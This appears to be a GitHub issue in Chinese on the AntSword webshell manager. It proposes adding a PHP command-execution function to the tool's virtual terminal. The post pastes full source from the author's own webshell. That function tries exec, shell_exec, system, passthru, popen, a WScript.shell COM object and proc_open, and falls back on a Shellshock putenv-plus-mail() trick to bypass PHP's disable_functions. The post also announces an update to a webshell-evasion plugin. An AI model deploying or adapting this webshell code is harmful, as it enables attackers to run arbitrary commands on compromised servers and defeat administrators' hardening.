建议增加PHP虚拟终端执行命令函数

[yzddmr6]

昨天偶然发现蚁剑不能执行命令的时候 自己的大马可以执行

对比了一下蚁剑跟大马的执行命令函数比较

https://github.com/AntSwordProject/antSword/commit/15aa4cb6705e42e1a044d51b8a0eab48d1f6f958#diff-a602712619a6f7e6b916e6064d2f1b22

自己的大马可以调用WScript.shell跟mail函数+putenv来bypass disable function

其实蚁剑自己的插件也可以bypass,但是最好能直接加上...
可以省一步操作或者是防止有些玄学问题导致插件exploit失败

附上源代码

function Exec_Run($cmd) { $res = ''; if(function_exists('exec')){@exec($cmd,$res);$res = join("\n",$res);} elseif(function_exists('shell_exec')){$res = @shell_exec($cmd);} elseif(function_exists('system')){@ob_start();@system($cmd);$res = @ob_get_contents();@ob_end_clean();} elseif(function_exists('passthru')){@ob_start();@passthru($cmd);$res = @ob_get_contents();@ob_end_clean();} elseif(@is_resource($f=@popen($cmd,'r'))){$res = '';while(!@feof($f)){$res .= @fread($f,1024);}@pclose($f);} elseif(substr(dirname($_SERVER["SCRIPT_FILENAME"]),0,1)!="/"&&class_exists('COM')){$w=new COM('WScript.shell');$e=$w->exec($cmd);$f=$e->StdOut();$res=$f->ReadAll();} elseif(function_exists('proc_open')){$length = strcspn($cmd," \t");$token = substr($cmd, 0, $length);if (isset($aliases[$token]))$cmd=$aliases[$token].substr($cmd, $length);$p = proc_open($cmd,array(1 => array('pipe', 'w'),2 => array('pipe', 'w')),$io);while (!feof($io[1])) {$res .= htmlspecialchars(fgets($io[1]),ENT_COMPAT, 'UTF-8');}while (!feof($io[2])) {$res .= htmlspecialchars(fgets($io[2]),ENT_COMPAT, 'UTF-8');}fclose($io[1]);fclose($io[2]);proc_close($p);} elseif(function_exists('mail')){if(strstr(readlink("/bin/sh"), "bash") != FALSE){$tmp = tempnam(".","data");putenv("PHP_LOL=() { x; }; $cmd >$tmp 2>&1");mail("[email protected]","","","","-bv");}else $res="Not vuln (not bash)";$output = @file_get_contents($tmp);@unlink($tmp);if($output != "") $res=$output;else $res="No output, or not vuln.";} return $res; }

[yzddmr6]

另外......as_webshell_venom 2.0更新了
已经pull request了
有空了麻烦通过一下,谢谢